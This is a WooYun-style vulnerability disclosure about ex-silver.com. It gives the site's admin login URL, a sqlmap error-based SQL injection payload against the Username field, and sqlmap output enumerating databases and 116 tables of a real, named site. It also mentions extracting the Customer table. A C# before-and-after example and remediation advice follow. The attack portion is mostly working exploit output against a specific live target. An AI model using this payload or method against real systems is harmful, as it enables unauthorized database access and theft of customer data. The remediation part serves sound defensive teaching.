WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reading --------------- http://drop.zone.ci/
2016-02-17: details reported to the vendor, awaiting the vendor's handling. 2016-02-22: the vendor has deliberately ignored the vulnerability; details disclosed to the public.
Admin backend: http://www.ex-silver.com/Admin/Login.aspx
The login request captured with Burp:
The request was fed to sqlmap to enumerate the databases:
[22:03:05] [INFO] parsing HTTP request from 'post.txt'
[22:03:05] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:03:05] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Username (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Username=test' AND 1092=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1092=1092) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'qdEN'='qdEN&Password=123456a&loginyzm=kit6&cSubmit=true
---
[22:03:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[22:03:05] [INFO] fetching database names
[22:03:05] [INFO] the SQL query used returns 11 entries
[22:03:05] [INFO] resumed: exSilver
[22:03:05] [INFO] resumed: ex-silver_0727
[22:03:05] [INFO] resumed: ex-silver_0730
[22:03:05] [INFO] resumed: ex-silver_31
[22:03:05] [INFO] resumed: master
[22:03:05] [INFO] resumed: model
[22:03:05] [INFO] resumed: msdb
[22:03:05] [INFO] resumed: ReportServer
[22:03:05] [INFO] resumed: ReportServerTempDB
[22:03:05] [INFO] resumed: SnailCMS
[22:03:05] [INFO] resumed: tempdb
available databases [11]:
[*] ex-silver_0727
[*] ex-silver_0730
[*] ex-silver_31
[*] exSilver
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SnailCMS
[*] tempdb
The 116 tables in the exSilver database. Note that the list contains pangolin_test_table, sqlmapoutput, D99_CMD and D99_Tmp: these are the scratch tables that injection tools (Pangolin, sqlmap's MSSQL takeover features and the D99-family tools) create in the target database, which suggests this injection point had already been exercised by others before this report.
Database: exSilver
[116 tables]
+-----------------------------+
| ActionLog |
| ActiveCustomers |
| Ad |
| Advertising |
| AnnualMeeting |
| Ballot |
| BallotIp |
| Banner |
| BuyInfo |
| CFTCSilver |
| CaiJinEvent |
| Calendar |
| CentralResult |
| ChangJIangColorNowPrice |
| ChinaCPI |
| ChinaGDP |
| ChinaPMI |
| ChinaPPI |
| ChinaSpend |
| Council |
| CountrySilver |
| CustAndNode |
| CustLevel |
| Customer |
| CustomerType |
| D99_CMD |
| D99_Tmp |
| DataBaiYinDingPanJia |
| DataDiaoJiZhongXin |
| DataDownload |
| DataGuiJinShuPrice |
| DataTouZiYinTiao |
| Englandbank |
| Europebank |
| Exchange |
| Famous |
| FedTable |
| FileInfo |
| FileType |
| FileTypeAndPersonnel |
| Fixedprice |
| Friendly |
| GSpotPrice |
| GoldETF |
| GoldETFStock |
| GoldProduction |
| Goldsupply |
| GuangDongSouthColorNowPrice |
| Guests |
| Holiday |
| HuaYin999 |
| HuaYin999_20150323 |
| Integrated |
| Investment |
| Japanbank |
| LevelInfo |
| LevelRole |
| Meeting |
| MenuPage |
| NetworkSelection |
| NetworkVoting |
| NewsKey |
| Nonferrous |
| OnlineCompany |
| OnlineUser |
| OuZhouWarGoldPrice |
| OuZhouWarSmallGold |
| PageWeb |
| PayAttention |
| PayAttentionOptions |
| Personnel |
| PersonnelFileType |
| PersonnelRole |
| PreviousMeeting |
| QuoteType |
| RealTimeQuotes |
| RegisterVip |
| Reportsummary |
| Research |
| Role |
| Rule |
| SellInfo |
| ShangHaiColorNowPrice |
| SilverData |
| SilverETF |
| SilverETF_20150617bak |
| SilverOutput |
| SilverOutputData |
| SilverPremium |
| Silveragio |
| Silverproduction |
| Silversupply |
| SoftwareDownload |
| Stock |
| SwapCenter |
| Template |
| ThematicInvestment |
| UKGDP |
| UsaAnnualGDP |
| UsaDataCentres |
| UsaHomesales |
| UsaIdleness |
| UsaPayrollsData |
| UsaPriceindex |
| UsaRetailsales |
| Userprice |
| V_SellInfo |
| WebNode |
| WebPage |
| Website_editor |
| applyfunc |
| base_price |
| business |
| pangolin_test_table |
| sqlmapoutput |
| yinfu |
+-----------------------------+
The contents of the Customer table in the exSilver database.
Fix: strengthen input filtering and validation. Character filtering alone is fragile; the reliable fix is to pass user input to SQL Server as query parameters instead of splicing it into the SQL text.
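The sqlmap payload above works because the login handler concatenates the Username field into its SQL text. The injected expression builds the string 'qbpjq' + '1' + 'qzqkq' from CHAR() calls and hands it to CONVERT(INT, ...); SQL Server refuses the conversion and its error message quotes the offending string, so any value the attacker substitutes for the '1' is read back through the error page. The following C# is an added example, not code from the ex-silver.com site or from this report; the table and column names (AdminUser, Username, Password) are assumptions, since the report shows only the table list and not the login handler. It shows the concatenated pattern the sqlmap result implies next to the parameterized form that closes the injection.

```csharp
// Added example for this report, not the site's own code. Table and column
// names (AdminUser, Username, Password) are assumptions.
using System;
using System.Data;
using System.Data.SqlClient;

public static class AdminLogin
{
    // BEFORE: the pattern the sqlmap finding implies. The request field is
    // pasted into the SQL text, so a Username of
    //   test' AND 1092=CONVERT(INT,(SELECT 'qbpjq'+...+'qzqkq')) AND 'qdEN'='qdEN
    // is executed as SQL. CONVERT then fails with
    //   Conversion failed when converting the nvarchar value 'qbpjq1qzqkq'
    //   to data type int.
    // and if that text reaches the HTTP response, any column in the database
    // can be read out the same way, one error at a time.
    public static bool LoginVulnerable(SqlConnection conn, string username, string password)
    {
        string sql = "SELECT COUNT(*) FROM AdminUser WHERE Username = '" + username +
                     "' AND Password = '" + password + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // AFTER: the SQL text is a constant; the inputs travel to SQL Server as
    // typed parameter values. A quote, a comment marker or a CONVERT(...)
    // inside Username is just characters in an NVARCHAR value and is never
    // parsed as SQL, so no filtering of "dangerous characters" is needed.
    // (Password storage is a separate topic: a real login should look up a
    // hash by username and verify it in code rather than compare in SQL.)
    public static bool LoginParameterized(SqlConnection conn, string username, string password)
    {
        const string sql =
            "SELECT COUNT(*) FROM AdminUser WHERE Username = @username AND Password = @password";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@username", SqlDbType.NVarChar, 64).Value = username;
            cmd.Parameters.Add("@password", SqlDbType.NVarChar, 128).Value = password;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Parameterization is the fix; as a second layer, the ASP.NET application should also run with customErrors enabled in web.config so raw SQL Server error text is never returned to the client. That setting alone does not remove the injection (boolean-based and time-based techniques still work), but it does close the error-based channel sqlmap used here.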
Severity: no impact (ignored by vendor)
Ignored at: 2016-02-22 23:10
Vulnerability rank: 4 (WooYun rating)
None yet.